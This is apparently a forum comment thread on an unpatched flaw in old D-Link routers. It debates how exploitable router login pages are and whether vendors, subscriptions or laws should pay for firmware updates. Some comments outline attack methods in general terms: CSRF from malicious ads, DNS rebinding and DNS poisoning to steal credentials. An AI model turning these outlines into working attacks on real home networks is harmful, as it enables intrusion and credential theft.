[dangus]

Until consumers are willing to spend on subscription services to keep devices up-to-date, new hardware is the de facto method of paying for software development work.

Of course, in reality, this CVE seems almost un-exploitable in the wild, anyway. How will an exploiter get to the login page in the first place? They'd have to know your network password and be in your physical vicinity, or your ISP would have to send traffic to your router's login page from the Internet.

So they'd have to physically drive around looking for these three specific D-Link routers.

And then what would they get out of a successful exploit? Access to your network's traffic and unprotected file shares (most people don't even have any file shares), and even that level of access will be rather useless for getting important information like bank credentials (protected by HTTPS).

Am I wrong about any of this?

A lot of non-technical people use old Android phones, old printers, etc, and never experience any serious security breach. Some of them do experience a security breach, but it's far more likely to happen in a social exploit (phishing, whaling, etc) or institutional breach (your reused password being breached from a database hack of a popular website). In a lot of ways, ignorance is bliss.

[spartas]

>Of course, in reality, this CVE seems almost un-exploitable in the wild, anyway. How will an exploiter get to the login page in the first place? They'd have to know your network password and be in your physical vicinity, or your ISP would have to send traffic to your router's login page from the Internet.

Nope. Not at all. Most router attacks these days are malicious JavaScript (like in ads and trackers) that send HTTP requests to the router from the user's own web browser (already inside the network). No proximity access is needed

https://arstechnica.com/information-technology/2019/07/websi...

[jjeaff]

Would this not also require some sort of exploitable CORS vulnerability?

[chopin]

CORS prevents the JS from seeing the result but it doesn't prevent the sending of the request.

This is one of the reasons my internal network is not 192.168.1.1/24 and the router is not 192.168.1.1.

[spartas]

> This is one of the reasons my internal network is not 192.168.1.1/24 and the router is not 192.168.1.1.

Do you also disable WebRTC on all clients on your network? An attacker (or script) may be foiled by your non-standard gateway network, but your work in obfuscating the router is wasted if they can get at your client IP address.

[kbenson]

Doesn't CORS generally send an OPTION request first to see if the target site even allows the requests, thus preventing this? That's what I've seen when trying to work around browser CORS limitations.

[upheaval7276]

only for ajax requests that are not "simple", that is requests that cannot be sent w/out JavaScript. The sending of this OPTIONS request is referred to as a pre-flight. A more through description at https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS

[foxylion]

You can also just do a normal form post request into an invisible iframe that is generated by the attacker's javascript.

[singron]

You can submit forms without CORS as long as there is no CSRF protection. I don't know what CSRF protection is being used.

[peeters]

Depends on the attack and the vulnerability. The article does say this:

> The attacks work when routers use weak administrative passwords and are vulnerable to CSRF attacks.

Which implies that a cross site request is being made. So e.g. you put a hidden form in a netf1ix.com page whose action is at some URL on the router. The user ends up accidentally posting data to that URL which is not affected by CORS and same-origin.

[jtaft]

Normal form posts don't require pre-flight requests. DNS rebinding attacks can be used too.

[dredmorbius]

Until consumers are willing to spend on subscription services...

You cannot shift a Gresham's Law race-to-the-bottom dynamic by insisting on consumer (or producer) willpower. You've got to enforce a floor.

In other consumer (and industrial) products, this has tended to happen through the combined mechanisms of strict liability, certification, and independent inspection (in specific cases).

Where manufacturers, or as seems more likely given the industry concentration around sales points, retailers, are liable for the consequences of unfit-for-purpose devices and services, a reasonable set of minimum requirements (including life-of-product and update requirements) can be specified, then you might see a shift to some mix of time-of-sale plus subscription service pricing and payment models.

More likely you'll see devices bundled with services (which sometimes happens), though preferably in a far more user-friendly basis than is presently the case (e.g., cable service set-top boxes).

There's actually a long history of leased-equipment business in the IT sector, most notably as pioneered by IBM in the 1950s and 1960s.

[harikb]

As soon as warranty/support expires, the device must be free for DRM/reverse-engineering. This will incentivize manufacturers to offer longer support.

Edit: Rather they should actually provide the spec, drivers etc

[ekianjo]

As support expires or EOL the manufacturer should be forced to release their firmware code to ensure older devices can be patched, if they want to keep operating and selling new devices. this requires legislation though.

[agret]

There are a lot of routers using GPL code that have open source firmware available (ddwrt,openwrt,tomato,etc.) I think once support for a device ends it should be mandated that the company release the source code for future development.

There is a worrying increase in the amount of IoT devices that will remain forever unpatched due to the (cheap overseas) manufacturers never updating them or ending support for them.

[swinglock]

Make that one year before ending support, so there is both time to prepare and incentive to open source early.

[ralph84]

Ma Bell was leasing telephones since the days of Alexander Graham Bell. In fact you weren't allowed to use any telephone except one leased from your telco until the breakup of the Bell System in the 80s.

Not sure that is what we want to go back to.

[dredmorbius]

There were definitely problems and abuses with the model.

But the hardware itself was robust and reliable.

[bsder]

Remember: "We don’t care. We don’t have to. We’re the Phone Company"

Fake commercial on Saturday Night Season 2 Episode 1.

(It wasn't called Saturday Night Live until later.)

[dredmorbius]

I find the story of Walter Shaw Sr. even more instructive.

Independent inventor convicted and gaoled by AT&T for "misdemeanor attachment", the crime of attaching non-AT&T equipment to AT&T's phone network.

https://en.wikipedia.org/wiki/Walter_L._Shaw

More on this in the first bit of "The Inventor and the Thief" on Snap Judgement:

https://www.wnycstudios.org/podcasts/snapjudgment/episodes/l...

[CamperBob2]

Because the hardware didn't do much of anything!

[dredmorbius]

Contrast Minitel, a videotext online system provided by the French government phone monopoly Postes, Télégraphes et Téléphones in 1980.

https://en.wikipedia.org/wiki/Minitel

[wmf]

See also the Charter lawsuit where it was revealed that Charter was renting very old equipment to their customers for years and didn't care.

[dredmorbius]

That's where the minimum standards aspect comes in. The problem of noncompetitive monopolies failing to innovate and actively quashing independent inventors (see: Walter Shaw, Sr., amongst many others) is a risk of this approach.

[Aloha]

AT&T didn't just come out and install a newer telephone because they had a newer model. If the equipment is fit for the service why replace it?

[TheSpiceIsLife]

If you rent a $100 device at $10 a month for 10 years you end up paying $1200 and still not owning it.

I can see why consumers and consumer advocate groups don’t like this.

[Aloha]

The customer should always have the option to buy their own hardware - that's to me something that was fought for (and won) with Carterphone

[dredmorbius]

AT&T later in its history, 1960s - 1970s, offered the option of uplines (touch-tone, "Streamline", "Princess", and eventually Mickey Mouse telephones) as service upgrades. So there wasn't no interest in innovation, though I'd agree with the general view that the interest was low.

[Aloha]

None of those were real technical improvements over the 500/2500 set however, they were upgrades designed to please the customer aesthetically.

Meaning, all of those sets performed more or less (in some cases less, specifically in certain special service applications) identically to a 2500/500, and at least one of those was a 2500 in a mouse shaped box.

Touch-Tone was actually a value add for the telco because it reduced register holding times in crossbar switches, and could reduce the amount of common control hardware needed, yet they still charged more for it (and the service too)

(Also, I think you mean trimline not streamline)

[wmf]

I should have said they were renting very old and inadequate equipment; it wasn't fine and they knew it.

[dangus]

And most consumers probably lease their routers through their ISP as modem/WiFi router combos, which essentially remain supported and updated by the ISP.

If we alternatively enforce a floor on security updates for user-purchased routers, let’s say we require security updates for the physical lifespan of the device (10 years?), they will be baked into the price of the device in some way, and I’m not sure the majority of home router customers who essentially look to spend around $20-40 will be willing to bear that cost.

An example of that in action would be purchasing a business SKU laptop compared to a consumer one, and taking a look at the length of driver support.

[cle]

Most routers I've seen have a setting to enable "remote management". The DIR 655 does (see pg. 75 of its manual). If you have enabled that, then its login page is accessible via the Internet.

Many small businesses not only have unprotected file shares, and have remote admin turned on so that their IT person can administer the router remotely (as silly as it is). I saw this so many times when I worked in IT. People make all sorts of assumptions about LAN privacy when setting up their network and devices.

[greggman2]

As others pointed out JavaScript can try to access stuff but even more than that, the 400 apps on your phone, the 50 on your Mac and all your Steam games on your PC, all have full network access that JavaScript in the browser does not have. They can access every port, send corrupted packets, and scan your entire network for exploitable devices.

[tinus_hn]

You can use Javascript in an ad to make the browser connect to the internal IP address, which often is something like 192.168.1.1 and then once you’re in you can add the device to a botnet and sell its bandwidth or reroute its traffic.

[Smithalicious]

I just fundamentally don't think a subscription service is fair here. After all, users are paying for the fixing of errors that shouldn't have been there to begin with. It's not the fixing of problems that are newly created but the fixing of defects that were there all along. Plus, the incentive here is backwards; in the most degenerate case, companies are incentivized to sell things as buggy as possible in order to sell the most bug fix subscriptions possible.

[ekianjo]

One solution would be to force the source code of non supported devices to be released (by law) so that third parties could be paid by individuals to update and patch them as long as there is a market.

[TheSpiceIsLife]

> Until consumers are willing to spend on subscription services...

Ok, I’m willing. Where do I sign up?

Which manufactures are offering this service for residential grade equipment?

[Marsymars]

Eero doesn't charge for updates, but they do have a subscription service for value-add services that cost them money, and have a pretty good track record of pushing automatic updates.

[lotsofpulp]

There is none. Everyone should have a Meraki security appliance in their home.

[TheSpiceIsLife]

Dear lord.

[syshum]

Until manufacturers are liable for the damage they cause to security, and data loss events for consumers manufactures will continue to have unrealistic planned obsolesce model (12 months should never be the expected life span of a router) to force consumers to continually buy new hardware

[CalChris]

I see your point but I overpay for the iPhone I’m typing this on partly for that upgrade service. It is also something I appreciate about the Tesla as opposed to every other car I’ve ever had.

[pbhjpbhj]

Why can't an attacker with router access poison the DNS, redirecting a bank address to the router itself with a fake cert, and duplication of the login screen and steal credentials that way? (Or probably better, steal online MUA [ie email] credentials).

I guess 2FA might block them, but if it were a typed in code you could still get it.

[mtgx]

Or manufacturers can stop making "smart" devices just so they can fill them with ads and malware, leaving customers exposed to unlimited amount of threats.

It's not like they're just "giving you the choice" either. TV makers have already started completely removing non-smart TVs from their line-ups for instance.

I don't want a smart TV. If I want my TV to be smart, I'll buy a $50-$100 set top box I can upgrade in 2-3 years and is probably significantly more secure. Meanwhile a "smart" TV I will keep for 10+ years, but won't receive updates even for 20% of its lifecycle.